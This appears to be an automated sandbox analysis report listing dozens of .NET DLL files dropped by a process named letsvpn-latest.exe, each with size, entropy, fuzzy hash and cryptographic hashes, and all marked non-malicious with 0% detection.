                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958901473799381
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x6oWJjWehqWOHlLf2KQcvBZ9NY07S+ShjmM6IGBkSoy0z:x6v/q3b2KZBZo07S+ST6nkTX
                                                                                                                                                                                                  MD5:3DA8C454B5F9E5F3B22603C2B681BD33
                                                                                                                                                                                                  SHA1:08DECEF175B8D1F178953999274847DBAF0D03D7
                                                                                                                                                                                                  SHA-256:B67ED6607475FC7F7A69AC0C62241062A52DC5F831F3433ED760F52F1083F993
                                                                                                                                                                                                  SHA-512:1AAB49A79CCC903E7486C0848023225FFF445F1A1F1B0EE31BC609D9F6F9266809A1F372388E68ECD54CF8EBB35A44E9E4E9419AA9B815346305780E5DA3DCE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43040
                                                                                                                                                                                                  Entropy (8bit):6.064632964448439
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FTyj5cKJfE+MJnnvnL0jxq3b2KZBZa89JtS+ST6nkeX:FTC5Ve0jE3qK7/mkX
                                                                                                                                                                                                  MD5:AF2D1149CA10620B40A349F6B67F82FD
                                                                                                                                                                                                  SHA1:39C24A88A8F6E26F4238DEE7D39266A30C9E315A
                                                                                                                                                                                                  SHA-256:E7402498B6412FABBD15287DE3792685617F2A1146014BE60AC40965652B2165
                                                                                                                                                                                                  SHA-512:5244D538995578C74CD656F79A65175AE60451DBCB3E0CB1F0F9E36A971A98AC31D8A5014871708F65C724A13CAF3814CA7ED7B5145F6F8EF38A37481CA9CC2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.889108022269452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:pqk53/hW3fZ+zWt4hqWOHlLf2KQcvBZ91aiS+ShjmM6IGBkSgz:pqk53MJoq3b2KZBZnS+ST6nkX
                                                                                                                                                                                                  MD5:5E7BDFD79859F22E5D9F5DD5F026517E
                                                                                                                                                                                                  SHA1:A6618DC790291C2E4CF7C26C336EBCF33D619B88
                                                                                                                                                                                                  SHA-256:CA66E00B269BE8D63EF8CEA8BB04CB7E3D9AA9662B83ABF7FBEEC1D3CC912BA8
                                                                                                                                                                                                  SHA-512:F1EC165581CB09180C383F7F43FC1E084AE73CED9B2533016E444D04E4AA78A64233F8EAE3CF4708B8E53E5D422A2A4B12CDDA05517FC1E73ED5964E540953CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19488
                                                                                                                                                                                                  Entropy (8bit):6.776949657141779
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lFCc4Y4OJWfOWqWWOW1hqWOHlLf2KQcvBZ9o0S+ShjmM6IGBkSUA:nCcyCLq3b2KZBZ1S+ST6nk9A
                                                                                                                                                                                                  MD5:4CBEB58C5611362601BDC06540422F1D
                                                                                                                                                                                                  SHA1:D3CB8204EF113D8817DB547CE8EC36FD43CBCF5E
                                                                                                                                                                                                  SHA-256:F63B8FCF9EBE4C0344B5D95EE65ECF83850C8E55A2DD4280615EA0B8DEB92021
                                                                                                                                                                                                  SHA-512:3538E7F9B604D060A18E8556545F5FEC5F53D9348898556FAFF38126D3F10B7300A08650ED99323EED123449178C1E461E80D69CA5C2DE9806BDCA8E145FCB7C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9834026919899745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CAWxMWRhqWOHlLf2KQcvBZ9/UWS+ShjmM6IGBkSxK:CvFq3b2KZBZyWS+ST6nkuK
                                                                                                                                                                                                  MD5:A0CFB7229C44350D8B167F809BCC5C82
                                                                                                                                                                                                  SHA1:C7322697682880AE761D49FBD54523ECAB2DCDD4
                                                                                                                                                                                                  SHA-256:491D8D66F1C221AFC45A78C722E440D1954E21FB0C7DF124D172D0E8D4A1EAC7
                                                                                                                                                                                                  SHA-512:38D5B7AB41341237BB8C3014083443C934DF9952C883D46F26B9A52A8C84EE89DE128887B4EF833E217BE9A022DDE8AC2F4691EEBB02324B2D34059EA6695E23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958092237087259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+AlcWHaWZhqWOHlLf2KQcvBZ9ooS+ShjmM6IGBkSse:P9zq3b2KZBZ9S+ST6nkne
                                                                                                                                                                                                  MD5:DF525B438444B76BCB156B66E7161E84
                                                                                                                                                                                                  SHA1:3DC313D7F3CC9CAF2E07B958BFDCD00DCB0DCF37
                                                                                                                                                                                                  SHA-256:3AD983B3F53F29734D1A7BFA34DF9D12890641AE701D7491380BA3F96160EC29
                                                                                                                                                                                                  SHA-512:96BF743CFA0A5E128213BF52B61F818ABD76AD48C9C23E042BF816BF2884F3203FB6678245CA21CE6D9B9B0D5648EDB239E7A5C19B87E1E84283B0738B751575
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.891837867115112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l8IZnWlNWxhqWOHlLf2KQcvBZ926lS+ShjmM6IGBkSQu:GUywq3b2KZBZXS+ST6nkTu
                                                                                                                                                                                                  MD5:849EF7F81E30B7588D0DE5E5D6BD8E40
                                                                                                                                                                                                  SHA1:F9D68F2AFEBCF43B9F70040CB312FEEC2C1DA8A6
                                                                                                                                                                                                  SHA-256:63B6ADB455FADEB5DCD50A54013EFB4FF38229FB7880876E808A682811B02C49
                                                                                                                                                                                                  SHA-512:D00A7E17D6CF293229CF93198D7C5607FBB47BA99A75AEBA1761057549F0B81E316B8B7E319FFBA9B421E2837261D79355947DFEACEC9FC1BE4C387FF714B7B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27168
                                                                                                                                                                                                  Entropy (8bit):6.589374706387424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:qQq33333333kX+TBi8Bq3b2KZBZUS+ST6nkz:tu1i803qKi/mZ
                                                                                                                                                                                                  MD5:BFC312F081410FB6DA38D96C81F1DBA0
                                                                                                                                                                                                  SHA1:AB97835A609001CE1A1A423E60C92F50DFB30E2F
                                                                                                                                                                                                  SHA-256:2164BC42B0909DF2674F4F301C24B865FDF3328D6DF4A11E34C29A2D13B16F51
                                                                                                                                                                                                  SHA-512:94D3FE930981A7E77BC116178F5328A1F666929FB9E6800C5AC8B2870CFCDD52E40AC92D260F1C5197065ADE6DFACE2FC5E9F591153AFC77642693AC4A491753
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55840
                                                                                                                                                                                                  Entropy (8bit):5.935591964243442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:fJbgUxvrIn01EkO/69KzwmOiGeCcSP8UIre3qK6/mj:f1xvrInsEkO/AKzwm3C0UOe2/M
                                                                                                                                                                                                  MD5:321AA362C269B7998E487EABBA76DF89
                                                                                                                                                                                                  SHA1:59717CD20D72BD4067D988BD098667AD328CA25F
                                                                                                                                                                                                  SHA-256:AF6EFED5F99926E2948F49CDA00D6EF52FEE0BD6006A5FF292A8D165C6C5054A
                                                                                                                                                                                                  SHA-512:8F73EED30895D32724B6731C1031632F070C8E695CEEA4644EAD4F0CB9D546AF7CBA26EC806033A2BC4661160123D4F86EB8A7B21767A7C716E91E7192758799
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9586207641045785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G28YFlXulWY/WJhqWOHlLf2KQcvBZ9mH6S+ShjmM6IGBkSB7IT:G0qCq3b2KZBZMaS+ST6nkhT
                                                                                                                                                                                                  MD5:2546F1626A6DA255A1BA53361C9BACAB
                                                                                                                                                                                                  SHA1:5F2BFC8C263EC4C16EECE35AF449BF796A38EC09
                                                                                                                                                                                                  SHA-256:4EF0AEE89AFE95C84FD39CD5E6B3C0615BEC80DD9F2A3E032431664054199B43
                                                                                                                                                                                                  SHA-512:D6F937F3617E365E697A42624D25608F151FE1838C01EBCDEDFAA98F3318939FB6AE61A954877FDCD18999E7F786E0C8875ACDA856E91B201D21E6C2FC101746
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.846896849834963
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:duMLcdQ5MW9MWWhqWOHlLf2KQcvBZ9Szk6hFWS+ShjmM6IGBkSb:8OcSp8q3b2KZBZV6SS+ST6nk4
                                                                                                                                                                                                  MD5:6D457DEF3C837293F37CA120532A14DB
                                                                                                                                                                                                  SHA1:8884226BCB76B3335EA1DDCC37C93304B9D43A2E
                                                                                                                                                                                                  SHA-256:DACB18FB653B44FFF1822A7048DECF50A45C009F86D5730646B168E06D8E3707
                                                                                                                                                                                                  SHA-512:1B43B755F1A9A374329E0BA9C7CAC46E1EA25768284E38A8D5094F0416FEBFE919C02D37AD4FBF2D21328A8592B159807931A683869BC519EEBE86D4E36A5C3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.918920376522975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2eZ7RqXWDRqlRqj0RqFW1hqWOHlLf2KQcvBZ97dPFHhS+ShjmM6IGBkSI:X9qKqjqjuqMq3b2KZBZv3S+ST6nkH
                                                                                                                                                                                                  MD5:BA85D809EC7A22051C54AF57D0AD7C6E
                                                                                                                                                                                                  SHA1:3A6D7B63940F0BC004C119EE802B2ABC0EF6D131
                                                                                                                                                                                                  SHA-256:C22CEC6D7BB7133464E72DD27F86C863717FDBB20B03B7A6992F84C41C9B0664
                                                                                                                                                                                                  SHA-512:09229B959088298EE827D9C6A0360C843B1EEF9FA9BC197582DD13988A7EFC86AB00DE0EC74B3A1E659968094FB97D9F61B880C36C17AC097B106A9816AE4F0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.733022853099171
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W4hqWOHlLf2KQcvBZ91fS+ShO:5vMhF2SzNzwu/Nljuzq3b2KZBZnS+ST8
                                                                                                                                                                                                  MD5:374B265EEB90FDED2AB11EE7543E2A0B
                                                                                                                                                                                                  SHA1:EC1EE2B9AB15AC348ABF1930ECCD677C2026AC33
                                                                                                                                                                                                  SHA-256:551DC892D640C22AD5D4A31991E053C753D59DFED8E9BA492F360FB8487BE70B
                                                                                                                                                                                                  SHA-512:D206BB30BB66CA6CE206B540791EB1BEC94B47F1A9E19F610DF5F207690E2E3D252F98571C743A2A72DC7C49AA5A6A5D56FBEC051B2E6E88AA36698B530145B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9967929370197135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:QZ4RLWdRfRJ0RZWJhqWOHlLf2KQcvBZ9k1S+ShjmM6IGBkSHVz:QZK0pJucq3b2KZBZMS+ST6nkkN
                                                                                                                                                                                                  MD5:B4DE713393E243E6B74ABA592A87BC70
                                                                                                                                                                                                  SHA1:D7B85D8EC0E3A2AE2AD7548E2AEFBC0FBEA0B3D3
                                                                                                                                                                                                  SHA-256:22B10C588D9D3BFD3F14551E26891880C3F10D30D9AE24907DF81155843619BF
                                                                                                                                                                                                  SHA-512:4968FD0B2DA1DC05D9B5ADB08E2DF79FDD232212BA59D0726FB1FE2C0A4E72E9DA83E2986A60E6CE20A05B4BFBB061A72F2E4DD4F6B6A6BB6AFDCED1845B4E53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.908181305951868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gYWsmWShqWOHlLf2KQcvBZ9dWS+ShjmM6IGBkSV:g2uq3b2KZBZCS+ST6nkq
                                                                                                                                                                                                  MD5:07F83DA30A4155730B722D028D2E7A5D
                                                                                                                                                                                                  SHA1:DA2085605B64741D85F5EDEF8D4E45C3D0A24AEA
                                                                                                                                                                                                  SHA-256:ACA4744E64C8EDAB708CD3193B4315C937CEEE3FC82CC7C35EF195E229EB8DFC
                                                                                                                                                                                                  SHA-512:0642BDF49C4CC0EA90E79770B64D5007A3CE8A37D9F7A69E1AD7522C43F0D7DFEEC365B1D525470442A6A24000F170F6BC9B1DBAA0FD9BE192B15F7ABDF6D3C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):106528
                                                                                                                                                                                                  Entropy (8bit):6.4118107859279405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Jvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXv3qKe/mvW:Fgk1tiLMYiDFvxqrWDWNoJXv6/AW
                                                                                                                                                                                                  MD5:CF91C18B32DA597C9E15105999487628
                                                                                                                                                                                                  SHA1:C863AC3BAB1FB4EB227E5722D0455F9A3B131B35
                                                                                                                                                                                                  SHA-256:4B34A0DEB1F888A8B48B39C6B4073B197344FB9B56DA1887767569937AA3B488
                                                                                                                                                                                                  SHA-512:7518606F44E43108C5666C09845EC5B5FE99BC84FFFD3DC6A830B840DBA74950FFD73609DAC0F6AE61746EFD691866B805A88B9B30968C9E725C39434D7A622F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.48384033148274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+CN9VYp/OiRcnZIfk8P/q3b2KZBZQCS+ST6nkK:+Q9ycnn0S3qKP/mc
                                                                                                                                                                                                  MD5:F41DE27679C17CAA34164449186B0D6C
                                                                                                                                                                                                  SHA1:5D911884D1D162BEAD6D5A3921620799D8A4A0B8
                                                                                                                                                                                                  SHA-256:A48D066FA2F1861EB5218A2149FF99DE13CC431699CCC5B476A9E3C270F9B7B9
                                                                                                                                                                                                  SHA-512:92C64376C72BE45DA44E29F2638BC69361D9C3DA7079CAFF3924DBD106E35EE1DF4D833F94876F2E17A8904544F4A7D30E707529B67454E7DA5166492F0ACB34
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.965595445677437
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:IKcuz1W1cWthqWOHlLf2KQcvBZ9KOVS+ShjmM6IGBkSq9:Iu81q3b2KZBZ3VS+ST6nkz
                                                                                                                                                                                                  MD5:F39321A5CFD4B2B4DF5B7297002CE169
                                                                                                                                                                                                  SHA1:9E9B762DE62DCE2854455BC9679BAC99C542223B
                                                                                                                                                                                                  SHA-256:7CD078C1EA5D6FD8225084858E2D09F9F6F4DEC433A8930ACBCD2C343D2DAD12
                                                                                                                                                                                                  SHA-512:0649CFAB684C6BC7FDD392033C0DA94D7646ABF9853BFBBBF1CCCD840A98996AB44E4375DF460522A4343A0B5AD30FB9FA93504F75FFEB5DBF2377AF76E9BDAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969722484889954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G+SWikWghqWOHlLf2KQcvBZ9e+dS+ShjmM6IGBkStci5:G+eKq3b2KZBZDdS+ST6nkI
                                                                                                                                                                                                  MD5:F934333E05C58E175207663C777901CC
                                                                                                                                                                                                  SHA1:2224BF0028BD1F061823F9730ACB82EF91A59D30
                                                                                                                                                                                                  SHA-256:26033A1C20A6BC7C8C69DE577B9F3B47249F6EE7B28747A972E160810E4A10CA
                                                                                                                                                                                                  SHA-512:799B511DB5784587B67A1551CF1B24A9F8DC37AD2D0D1378D0A89241F44821ED3F47E22118EE9427EF5E766F79F64C41C64F6C43F1F60FC58D7669E2738EF59A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005950112883477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:piAWzgWj6hqWOHlLf2KQcvBZ9JOkXS+ShjmM6IGBkSF8b:wtkq3b2KZBZukS+ST6nkIU
                                                                                                                                                                                                  MD5:DDE1CE18B4DB03BE26C9DC5D1364B9ED
                                                                                                                                                                                                  SHA1:CA068FE5A6187CED9DC64C2F861D405A78D498BA
                                                                                                                                                                                                  SHA-256:67908E6B6AEC9096E22708584061BCE00FC0470EE8BE85754533F32631C49172
                                                                                                                                                                                                  SHA-512:C28EB8E74C6A730B94FEF3667EDFEB37C22F2B307882589020A33B290ED3BF35CC120677A6D7AA1FD27F3380381651A4948B160C474C473F4C8C0B62A6281F37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.970704080069797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:mBLRWbYWAhqWOHlLf2KQcvBZ9LAuDS+ShjmM6IGBkSHN:mB2Oq3b2KZBZTS+ST6nkgN
                                                                                                                                                                                                  MD5:8C374646D6CFE62A64F99AC6883D769C
                                                                                                                                                                                                  SHA1:CC08A69E0618A534B15CA59F90CBD775FC286EB4
                                                                                                                                                                                                  SHA-256:1B1FBF9870296C136AB3EAD15975B2F5B764838FB576A24E002BBCD68B0C1AC7
                                                                                                                                                                                                  SHA-512:AEDA2CD3E7F98B663EEF05B8D160B66E7F0BFEF9628631DB3144241739BB2079B207FCA040087ED76970425F05A61AD74E8C34C284B0628476527AAED8B4A499
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956841147765326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iHW4/Wv7hqWOHlLf2KQcvBZ95YuS+ShjmM6IGBkSw:irGtq3b2KZBZwuS+ST6nk3
                                                                                                                                                                                                  MD5:121900FAF0866DA1543E360231896FB5
                                                                                                                                                                                                  SHA1:D2511193D20B2FC38A3CEAA1E6076025AEBDC26B
                                                                                                                                                                                                  SHA-256:BA84F39643E8D9047DE7659D4F754D92D945D89F22B805B0732862CAF25AD315
                                                                                                                                                                                                  SHA-512:2F0B33A4E792CD53BCCA605BF5BB3507ABB6755622D8F51948F03AE201695AE2689CD78DB1E8BDDED596E997653F6966C8A54D52F5085EA25A27C7871615FBC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010818325491102
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4vk7hWmCWthqWOHlLf2KQcvBZ9kzS+ShjmM6IGBkSZ:4s7/Pq3b2KZBZWS+ST6nkq
                                                                                                                                                                                                  MD5:FC146383703882794B07AE23F5A7A66E
                                                                                                                                                                                                  SHA1:32ECFBCB81732FA23DAA8E3259D1DAB2BB5F82AB
                                                                                                                                                                                                  SHA-256:56F7B1883AB592EA9E8505E62AA96E58C4F5E1437BCC4CFC53B975AE945EF646
                                                                                                                                                                                                  SHA-512:A3E49D21BC39B6C49B79DB85F2C09A7CB3509021D51EFD4A46A08D1C8A111CF997F8461D9BFD944AB4DF5B7EEFBD6187CCB7242831E2D461F2E5C75E7BB82EAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48672
                                                                                                                                                                                                  Entropy (8bit):5.996358920818446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:2xua7db+smzMnSzBt++0YfTF61O+luv5tywq3b2KZBZIS+ST6nkv:2xH7ssKugt+++1luv5tyD3qK2/mB
                                                                                                                                                                                                  MD5:D7EC72C65DE0FFDD7722008425F26B08
                                                                                                                                                                                                  SHA1:38BEC24A3EA5DE5E66C04B86FC532FB1BB9C6E58
                                                                                                                                                                                                  SHA-256:B7DCC93166B69CEBCBE23E459B1307FF828C8DE7909B1C762A403A3F5AC957D7
                                                                                                                                                                                                  SHA-512:B8BEA46B2DCFF31B3867B1642558A2B6B04B832ADB0E8B356FE9A5674B011A47FB411D3075677AC088AB13B4A34166B9B000348F81ED24A12CA61A7C6C1F2ACC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.685743907435627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JANJdesEvbDYUgmpWrxWNPfWqxWfPthqWOHlLf2KQcvBZ9faGS+ShjmM6IGBkSah:sclTD/yod2rq3b2KZBZrS+ST6nkFh
                                                                                                                                                                                                  MD5:9D42E9C41B33562AFEA35DE7C804C754
                                                                                                                                                                                                  SHA1:006F54589A5F69913032B66152AE6E82FA9DDBC2
                                                                                                                                                                                                  SHA-256:88572FD2F316A9B3DB0C7ED15F46BF599CC478E0180D3CBFF461F2F3C116B419
                                                                                                                                                                                                  SHA-512:872AC5AFF634EFE5A40B3B9F96E3E2391A553A7D696477602829478E4B62C80D6CA7B54E14708A580CC96B2F2A73657B53FB8443A8C211DC2EB6DA92EB7932FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980062550753211
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGMWCUWDhqWOHlLf2KQcvBZ9koEcobKS+ShjmM6IGBkSDR:i3zq3b2KZBZdE5KS+ST6nkER
                                                                                                                                                                                                  MD5:30A53C66C4F7DBA85CEF0AD632D56D1A
